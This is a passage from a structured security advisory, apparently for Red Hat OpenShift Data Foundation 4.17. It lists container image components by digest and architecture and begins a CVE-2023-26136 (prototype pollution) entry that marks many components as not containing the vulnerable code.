"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64", }, product_reference: "odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le", }, product_reference: "odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64 as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64", }, product_reference: "odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x", }, product_reference: "odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le", }, product_reference: "odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64 as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64", }, product_reference: "odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le", }, product_reference: "odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x", }, product_reference: "odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64 as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64", }, product_reference: "odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x", }, product_reference: "odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le", }, product_reference: "odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64 as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64", }, product_reference: "odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le", }, product_reference: "odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x", }, product_reference: "odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64 as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64", }, product_reference: "odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64 as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64", }, product_reference: "odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le", }, product_reference: "odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x", }, product_reference: "odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64 as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64", }, product_reference: "odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64 as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64", }, product_reference: "odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x", }, product_reference: "odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le", }, product_reference: "odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64 as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64", }, product_reference: "odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x", }, product_reference: "odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le", }, product_reference: "odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64 as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64", }, product_reference: "odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le", }, product_reference: "odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x", }, product_reference: "odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x", relates_to_product_reference: "9Base-RHODF-4.17", }, ], }, vulnerabilities: [ { acknowledgments: [ { names: [ "Kokorin Vsevolod", ], }, ], cve: "CVE-2023-26136", cwe: { id: "CWE-1321", name: "Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution')", }, discovery_date: "2023-07-03T00:00:00+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le", 